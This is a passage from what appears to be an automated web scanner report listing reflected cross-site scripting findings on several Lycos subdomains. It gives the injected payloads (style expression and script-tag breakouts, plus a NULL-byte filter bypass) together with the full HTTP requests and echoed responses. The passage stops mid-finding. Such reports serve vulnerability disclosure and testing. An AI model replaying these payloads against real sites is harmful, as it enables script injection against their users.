1.261. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/sports-and-fitness-211

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 405f6"style%3d"x%3aexpression(alert(1))"d91b7e01036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 405f6"style="x:expression(alert(1))"d91b7e01036 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/sports-and-fitness-211?405f6"style%3d"x%3aexpression(alert(1))"d91b7e01036=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75271

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Sports &amp; Fitness Deals
...[SNIP]...
<a href="?pn=2&amp;405f6"style="x:expression(alert(1))"d91b7e01036=1">
...[SNIP]...

1.262. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/televisions-159

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b2c"style%3d"x%3aexpression(alert(1))"4b1d9044497 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56b2c"style="x:expression(alert(1))"4b1d9044497 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/televisions-159?56b2c"style%3d"x%3aexpression(alert(1))"4b1d9044497=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:25 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 77288

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Televisions Deals, Televis
...[SNIP]...
<a href="?pn=2&amp;56b2c"style="x:expression(alert(1))"4b1d9044497=1">
...[SNIP]...

1.263. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/travel-and-entertainment-206

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce857"style%3d"x%3aexpression(alert(1))"4eb2c487c66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce857"style="x:expression(alert(1))"4eb2c487c66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/travel-and-entertainment-206?ce857"style%3d"x%3aexpression(alert(1))"4eb2c487c66=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75364

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Travel &amp; Entertainment
...[SNIP]...
<a href="?pn=2&amp;ce857"style="x:expression(alert(1))"4eb2c487c66=1">
...[SNIP]...

1.264. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7777"style%3d"x%3aexpression(alert(1))"0aae570a8e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7777"style="x:expression(alert(1))"0aae570a8e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/buy-com-233?b7777"style%3d"x%3aexpression(alert(1))"0aae570a8e2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76356

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Buy.com Deals, Buy.com Sal
...[SNIP]...
<a href="?pn=2&amp;b7777"style="x:expression(alert(1))"0aae570a8e2=1">
...[SNIP]...

1.265. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 950e9"style%3d"x%3aexpression(alert(1))"0396bb4ae4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 950e9"style="x:expression(alert(1))"0396bb4ae4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/ebay-50?950e9"style%3d"x%3aexpression(alert(1))"0396bb4ae4a=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75658

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>eBay Deals, eBay Sales, eB
...[SNIP]...
<a href="?pn=2&amp;950e9"style="x:expression(alert(1))"0396bb4ae4a=1">
...[SNIP]...

1.266. http://deals.lycos.com/deals/stores/mwave-521 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/mwave-521

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16584"style%3d"x%3aexpression(alert(1))"c07f1c3e4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16584"style="x:expression(alert(1))"c07f1c3e4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/mwave-521?16584"style%3d"x%3aexpression(alert(1))"c07f1c3e4f=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75096

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>mwave Deals, mwave Sales,
...[SNIP]...
<a href="?pn=2&amp;16584"style="x:expression(alert(1))"c07f1c3e4f=1">
...[SNIP]...

1.267. http://deals.lycos.com/deals/stores/tigerdirect-597 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/tigerdirect-597

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5d02"style%3d"x%3aexpression(alert(1))"b40fd06c19d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5d02"style="x:expression(alert(1))"b40fd06c19d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/tigerdirect-597?b5d02"style%3d"x%3aexpression(alert(1))"b40fd06c19d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76210

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>TigerDirect Deals, TigerDi
...[SNIP]...
<a href="?pn=2&amp;b5d02"style="x:expression(alert(1))"b40fd06c19d=1">
...[SNIP]...

1.268. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb365"style%3d"x%3aexpression(alert(1))"303ad275b1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb365"style="x:expression(alert(1))"303ad275b1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/walmart-321?bb365"style%3d"x%3aexpression(alert(1))"303ad275b1f=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:55:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:46 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74747

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Walmart Deals, Walmart Sal
...[SNIP]...
<a href="?pn=2&amp;bb365"style="x:expression(alert(1))"303ad275b1f=1">
...[SNIP]...

1.269. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 963e7"><script>alert(1)</script>1ea902f3967 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tos.php/963e7"><script>alert(1)</script>1ea902f3967 HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:22:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:22:09 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 91334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<a href="/tos.php/963e7"><script>alert(1)</script>1ea902f3967#acceptance">
...[SNIP]...

1.270. http://jobs.lycos.com/search [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The value of the l request parameter is copied into the HTML document as text between TITLE tags. The payload 91b55</title><script>alert(1)</script>4bc6160af5e was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=&l=91b55</title><script>alert(1)</script>4bc6160af5e HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 15:24:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16555

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<title>Job listings in 91b55</title><script>alert(1)</script>4bc6160af5e on Lycos Jobs</title>
...[SNIP]...

1.271. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be3fc"style%3d"x%3aexpression(alert(1))"867ed00c325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be3fc"style="x:expression(alert(1))"867ed00c325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?q=Accounting+%2F+Finance&be3fc"style%3d"x%3aexpression(alert(1))"867ed00c325=1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 15:25:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:25:20 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;q=Accounting / Finance&amp;be3fc"style="x:expression(alert(1))"867ed00c325=1">
...[SNIP]...

1.272. http://jobs.lycos.com/search [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload 2ee0f</title><script>alert(1)</script>889686a6c1d was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q={searchTerms}2ee0f</title><script>alert(1)</script>889686a6c1d&src=OS HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 15:23:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:23:23 GMT; path=/
Set-Cookie: PARTNER=os
Set-Cookie: PARTNER=deleted; expires=Sun, 07-Feb-2010 15:23:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<title>{searchTerms}2ee0f</title><script>alert(1)</script>889686a6c1d Jobs Near You on Lycos Jobs</title>
...[SNIP]...

1.273. http://jobs.lycos.com/search [x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f6c"style%3d"x%3aexpression(alert(1))"62f2861325d was submitted in the x parameter. This input was echoed as a5f6c"style="x:expression(alert(1))"62f2861325d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search?x=1a5f6c"style%3d"x%3aexpression(alert(1))"62f2861325d HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; diktfc=B8FEA4817F4F9A2F9EF76B42F744B31694D29E4B7510; CORE-STICKY=R3839803822; __utmz=1.1297090290.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LycosJobs=iitpttomiuvqsudrh267lm8k70; __utma=1.1087446052.1297090290.1297090290.1297090290.1; PENTA=173.193.214.243.1297090182456621; __utmc=1; __utmb=1.3.10.1297090290;

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839803822; path=/
Date: Mon, 07 Feb 2011 16:04:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 16:04:03 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 60454

<pre class="cake-debug"><a href="javascript:void(0);" onclick="document.getElementById('cakeErr1-trace').style.display = (document.getElementById('cakeErr1-trace').style.display == 'none' ? '' : 'none
...[SNIP]...
<a href="/jobs/search?pn=2&amp;x=1a5f6c"style="x:expression(alert(1))"62f2861325d&amp;q=">
...[SNIP]...

1.274. http://jobs.lycos.com/search [x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

